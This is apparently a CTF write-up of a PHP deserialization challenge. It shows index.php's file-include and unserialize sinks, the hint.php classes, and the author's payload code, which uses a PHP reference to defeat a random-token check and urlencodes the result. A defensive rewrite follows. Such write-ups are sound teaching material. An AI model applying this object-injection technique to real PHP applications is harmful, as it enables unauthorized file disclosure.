A deserialization challenge

When I run it directly in hint.php there is no problem, and it can read the flag.

$a=new Flag("flag.php");
$a->token=&$a->token_flag;
$a = new Handle($a);
print serialize($a);

But executing it through the deserialization string ran into a problem.

Adding urlencode encoding solved the problem.

index.php

<html>
<?php
error_reporting(0);
$file = $_GET["file"];
$payload = $_GET["payload"];
if(!isset($file)){
    echo 'Missing parameter'.'<br>';
}
if(preg_match("/flag/",$file)){
    die('hack attacked!!!');
}
@include($file);
if(isset($payload)){
    //$url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'],$query);
    foreach($query as $value){
        if (preg_match("/flag/",$value)) {
            die('stop hacking!');
            exit();
        }
    }
    var_dump($payload);
    $payload = unserialize($payload);
    echo "<br>";
    var_dump($payload);
}else{
    echo "Missing parameters";
}
?>
<!--Please test index.php?file=xxx.php -->
<!--Please get the source of hint.php-->
</html>

hint.php

<?php
class Handle{
    public $handle;//changed to public for testing; originally private
    public function __wakeup(){
        foreach(get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking up\n";
    }
    public function __construct($handle) {
        $this->handle = $handle;
        var_dump("asasa");
    }
    public function __destruct(){
        echo "1234";
        $this->handle->getFlag();
    }
}

class Flag{
    public $file;
    public $token;
    public $token_flag;

    function __construct($file){
        echo "bbb";
        $this->file = $file;
        $this->token_flag = $this->token = md5(rand(1,10000));
    }

    public function getFlag(){
        echo "aaaaa";
        $this->token_flag = md5(rand(1,10000));
        if($this->token === $this->token_flag)
        {
            echo "aaa";
            if(isset($this->file)){
                echo @highlight_file($this->file,true);
            }
        }
    }
}

//Test code I added myself
//Both constructors require their argument, so pass it when creating the objects
$object = new Handle(new Flag("flag.php"));
$object->handle->token=&$object->handle->token_flag;
print serialize($object);



?>

flag.php

flag
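
The two sinks in index.php, include($file) and unserialize($payload), in a hardened form. This is an added example, not part of the original post or the challenge: Flag and Handle are cut-down stand-ins for the hint.php classes, and PAGES, resolve_page and decode_payload are hypothetical names.

```php
<?php
// Added example, not the challenge's code. Flag and Handle are cut-down
// stand-ins for the hint.php classes; PAGES, resolve_page and
// decode_payload are hypothetical names.
class Flag {
    public $file, $token, $token_flag;
    public function getFlag() { echo "getFlag() reached: {$this->file}\n"; }
}
class Handle {
    public $handle;
    public function __destruct() {              // same sink as hint.php
        if ($this->handle instanceof Flag) { $this->handle->getFlag(); }
    }
}

const PAGES = ['hint' => 'hint.php'];           // assumed allow-list

// Instead of include($file): the request selects a key, never a path.
function resolve_page(string $name): ?string {
    return PAGES[$name] ?? null;
}

// Instead of unserialize($payload): no class may be instantiated, so
// Handle::__wakeup() and Handle::__destruct() cannot run on request data.
function decode_payload(string $payload) {
    $value = @unserialize($payload, ['allowed_classes' => false]);
    if ($value === false && $payload !== serialize(false)) {
        return null;                            // malformed input
    }
    if ($value instanceof __PHP_Incomplete_Class) {
        return null;                            // an object was sent: reject
    }
    return $value;
}

// Constructed sample input: the object graph built in the post.
$flag = new Flag();
$flag->file = 'flag.php';
$flag->token = &$flag->token_flag;
$handle = new Handle();
$handle->handle = $flag;
$payload = serialize($handle);
$handle->handle = null;                         // keep our own copy inert
unset($handle, $flag);

var_dump(decode_payload($payload));             // object payload
var_dump(decode_payload(serialize(['page' => 2])));  // plain data
var_dump(resolve_page('hint'), resolve_page('flag.php'));
```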

2019.4.21

